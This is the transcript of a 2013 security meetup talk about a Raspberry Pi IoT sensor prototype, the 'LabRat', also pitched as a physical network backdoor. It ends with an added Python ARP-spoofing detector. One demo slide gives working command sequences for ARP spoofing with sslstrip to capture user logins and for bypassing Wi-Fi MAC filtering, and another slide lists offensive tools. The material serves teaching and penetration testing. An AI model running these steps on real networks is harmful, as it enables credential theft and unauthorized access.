The LabRat - Physical backdoor hacks and IOT primer



null Bangalore Chapter - July 2013 Meet

Usage Rights

© All Rights Reserved

The LabRat - Physical backdoor hacks and IOT primer: Presentation Transcript

  • The LabRat: Physical Backdoor Hacks and Internet of Things (IOT) Primer. Akshat Sharma, TME, Cisco Systems.
  • The Raspberry Pi: Image Downloads and Updates -- working with GPIO, interfacing with screens. Google’s your Best Friend
  • Raspberry Pi as a Physical Backdoor into your network
    It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello
    - Rogue APs
    - Mac Spoofing on wired Networks
    - MITM attacks
  • The LabRat Circuit (diagram): Temperature Sensor, Humidity Sensor and Optical Fiber Tester (IR LED - Receiver pair over Optical Fiber, Binary Signal In) connected to channels CH0, CH1, CH2, CH3, with CLK, CS (AL), MOSI and MISO lines.
  • The LabRat - a Proof of Concept Prototype. The Raspberry Pi – a $35 Linux Computer that powers the LabRat prototype. To get more info on the Raspberry Pi – visit
  • The LabRat Prototype: Current Setup
    - 10 inch Capacitive Touchscreen
    - Optical Fiber Tester
    - Humidity Sensor
    - Temperature Sensor
    - Raspberry-Pi
    - HDMI-to-LVDS converter board
    - 10,000 mAH Lithium Polymer Battery
  • The LabRat Prototype: LM 35 + ADS7841 Temperature Sensor
    - LM 35 Temperature Sensor
    - ADS7841 Analog to Digital Converter
  • The LabRat Prototype: Humidity Sensor SMD + ADS7841
    - ADS7841 Analog to Digital Converter
    - Humidity Sensor SMD
  • The LabRat Prototype: Optical Fiber Tester
    - Optical Fiber Holders
    - Infra-red LED-Receiver Combination to transmit Messages via the Fiber
  • Connecting to an IOT Cloud - Formerly Cosm, Pachube
  • Set up a Cosm (Now Xively) Account
    - Register on Cosm (Xively) and Add Device
    - You will Receive an API Key and FEED ID
    - Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
  • Setting up the Python Script to send Data to Xively
    Install EEML package from github:
        sudo apt-get install python-dev
        sudo apt-get install python-pip
        sudo easy_install -U distribute
        sudo pip install rpi.gpio    # to work with RPi GPIO pins
        wget -O geekman-python-eeml.tar.gz eeml/tarball/master
        tar zxvf geekman-python-eeml.tar.gz
        cd geekman-python-eeml*
        sudo python setup.py install
    Set up Python Script:
        # source eeml package
        import eeml
        <snip>
        API_KEY = 'YOUR_API_KEY'
        FEED = YOUR_FEED_ID
        API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
  • The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at
  • The LabRat Prototype: Python Scripts
    1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat, in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics.
    2) The same Python Script sends an email to lab-admins whenever the Temperature or Humidity values exceed a pre-decided Threshold.
    3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
  • The LabRat Prototype: Current List of Penetration-Testing Tools
    Information Gathering: wireshark, tcpflow, ngrep, hostmap, kismet, btscanner, sslscan, sslstrip, sslsniff, ssldump, tcptraceroute, netmask, tcpdump, zenmap, nmap, arp-fingerprint, dnswalk, dnstracer
    Vulnerability Assessment: airodump-ng, sqlmap, nikto, svcrack
    Exploitation Tools: aircrack-ng, airmon-ng, airodump-ng, aireplay-ng, sqlninja, exploit-db
    Privilege Escalation: wireshark, ettercap, tcpreplay, tcpick, packit, packeth, dsniff
    Maintaining Access: ptunnel, netcat, ftp-proxy, udp-tunnel, proxychains, dns2tcp
  • DEMO
    - Arp Spoofing using SSLstrip and arpspoof
    - Mac Spoofing using Airmon-ng and macchanger
    - Packet Sniffing using Wireshark
    - Other MITM attacks
  • Arp Spoofing and Mac-Spoofing Attacks
    Arp Spoofing
    - Set up Port Forwarding
        iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
        echo '1' > /proc/sys/net/ipv4/ip_forward
    - Start Arp spoofing. Spoof the Gateway
        arpspoof -i wlan0 <gateway address>
    - Start sslstrip and log User Information (use -k option to log out users from their current sessions, forcing them to re-login)
        sslstrip -k -l 8080
    Mac Spoofing on Wifi (How to bypass Mac Filtering)
    - ifconfig eth0 down
    - airmon-ng start wlan0
    - iwlist wlan0 scanning
    - airodump-ng -c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices
    - ifconfig wlan0 down
    - Now use macchanger
    - macchanger -m <mac of allowed devices> wlan0
    - ifconfig wlan0 up
  • Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
  • Thank You
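
Defender-side view of the Arp Spoofing slide above, as an added example that is not part of the original slides: the gateway's IP suddenly being announced by a different MAC is the observable trace of that demo, and it can be flagged from ARP replies. The function name, alert names and the sample capture (text in the style of `tcpdump -n arp` output, with constructed addresses) are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Matches the "Reply <ip> is-at <mac>" part of tcpdump's ARP reply lines.
ARP_REPLY = re.compile(
    r"Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE)

# Constructed sample (not from the talk): gateway 192.168.1.1 is announced by
# its real MAC first, then by the MAC that also belongs to host 192.168.1.50.
SAMPLE_CAPTURE = """\
10:00:01.100000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
10:00:02.200000 ARP, Reply 192.168.1.50 is-at de:ad:be:ef:00:50, length 28
10:00:03.300000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:05.400000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:50, length 28
10:00:06.500000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:50, length 28
10:00:07.600000 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20, length 28
"""

def detect_arp_spoofing(capture, pinned=None):
    """Return alerts as (kind, ip_or_ips, expected_mac, observed_mac) tuples.

    pinned: optional {ip: mac} of known-good bindings, e.g. the gateway.
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    seen = {}                      # ip -> MAC from the most recent reply
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed
    alerts = []
    for line in capture.splitlines():
        match = ARP_REPLY.search(line)
        if not match:
            continue               # requests and non-ARP lines are ignored
        ip, mac = match.group(1), match.group(2).lower()
        alert = None
        if ip in pinned and mac != pinned[ip]:
            alert = ("pinned-mismatch", ip, pinned[ip], mac)
        elif ip in seen and seen[ip] != mac:
            alert = ("binding-changed", ip, seen[ip], mac)
        if alert and alert not in alerts:   # repeated replies alert once
            alerts.append(alert)
        seen[ip] = mac
        ips_by_mac[mac].add(ip)
    # One MAC answering for several IPs is typical of a host in the middle.
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(("mac-claims-many-ips", ",".join(sorted(ips)), None, mac))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE, {"192.168.1.1": "00:11:22:33:44:55"}):
        print(alert)
```

A "binding-changed" alert can also come from a legitimate DHCP re-lease or a gateway failover, so pinning the gateway's known MAC gives the more reliable signal.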